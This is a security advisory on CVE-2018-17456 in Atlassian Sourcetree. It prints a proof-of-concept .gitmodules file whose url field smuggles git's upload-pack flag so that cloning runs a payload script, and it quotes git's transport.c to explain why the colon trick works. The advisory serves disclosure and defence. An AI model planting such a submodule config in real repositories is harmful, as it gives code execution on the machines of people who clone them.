ASA-2019-00128 – Sourcetree: Input validation vulnerability via Git submodules


Allele Security Alert

ASA-2019-00128

Identifier(s)

ASA-2019-00128

Title

Input validation vulnerability via Git submodules

Vendor(s)

Atlassian

Product(s)

Sourcetree

Affected version(s)

Sourcetree for macOS starting with 1.2 before version 3.1.1
Sourcetree for Windows starting with 0.5a before version 3.0.17

Fixed version(s)

Sourcetree for macOS version 3.1.1
Sourcetree for Windows version 3.0.17

Proof of concept

Yes

Description

Sourcetree for macOS before version 3.1.1 and Sourcetree for Windows before version 3.0.17 were both vulnerable to CVE-2018-17456. A remote attacker with permission to commit to a git repository linked in Sourcetree for macOS or Windows is able to exploit this issue to gain code execution on the system.

Technical details

The .gitmodules file looks as follows:

[submodule "x:x"]
path = x:x
url = -u./payload

The actual command being injected is set by the url, -u./payload points the upload-pack flag of git clone to the payload shell script. Note also the : within the path, this part is needed to actually get the payload script executed.

The path will end up as the repository URL in the subsequent clone operation:

execve("/usr/lib/git-core/git", ["/usr/lib/git-core/git", "clone",
"--no-checkout", "--progress", "--separate-git-dir",
"/tmp/huhu/.git/modules/x:x", "-u./payload", "/tmp/huhu/x:x"],...

As the actual URL from .gitmodules is interpreted as the -u argument.

The colon is due to the fact, that the colon character let us go past those lines in transport.c:

} else if (url_is_local_not_ssh(url) && is_file(url) && is_bundle(url, 1)) {
    struct bundle_transport_data *data = xcalloc(1, sizeof(*data));
    transport_check_allowed("file");
    ret->data = data;
    ret->vtable = &bundle_vtable;
    ret->smart_options = NULL;

Due to url_is_local_not_ssh will return false due to the colon in the path. And therefore later on in the code the smart_options containing the uploadpack setting are still in place:

} else {
    /* Unknown protocol in URL. Pass to external handler. */
    int len = external_specification_len(url);
    char *handler = xmemdupz(url, len);
    transport_helper_init(ret, handler);
    }

    if (ret->smart_options) {
        ret->smart_options->thin = 1;
        ret->smart_options->uploadpack = "git-upload-pack";
        if (remote->uploadpack)
            ret->smart_options->uploadpack = remote->uploadpack;
        ret->smart_options->receivepack = "git-receive-pack";1
        if (remote->receivepack)
            ret->smart_options->receivepack = remote->receivepack;
    }

The constraint to have a colon in the path seems to hinder exploitation on Windows as a colon is a forbidden character within a path on Windows. However as noted by some people during the disclosure: Git running within the Windows Subsystem for Linux or cygwin will allow exploitation on Windows hosts.

Credits

Terry Zhang (Tophant)

Reference(s)

Sourcetree Security Advisory 2019-03-06
https://confluence.atlassian.com/sourcetreekb/sourcetree-security-advisory-2019-03-06-966678691.html

Input validation vulnerability via Git in Sourcetree for Mac – CVE-2018-17456
https://jira.atlassian.com/browse/SRCTREE-6394

Input validation vulnerability via Git in Sourcetree for Windows – CVE-2018-17456
https://jira.atlassian.com/browse/SRCTREEWIN-11292

[Announce] Git 2.14.5, 2.15.3, 2.16.5, 2.17.2, 2.18.1, and 2.19.1
https://marc.info/?l=git&m=153875888916397&w=2

CVE-2018-17456
https://gist.github.com/joernchen/38dd6400199a542bc9660ea563dcf2b6

RCE via Git submodules PoC
https://github.com/joernchen/poc-submodule

CVE-2018-17456
https://github.com/xichawai/CVE-2018-17456

CVE-2018-17456
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17456

CVE-2018-17456
https://nvd.nist.gov/vuln/detail/CVE-2018-17456

If there is any error in this alert or you wish a comprehensive analysis, let us know.

Last modified: March 12, 2019

We are not responsible for any data loss, device corruption or any other type of issue due to the use of any information mentioned in our security alerts.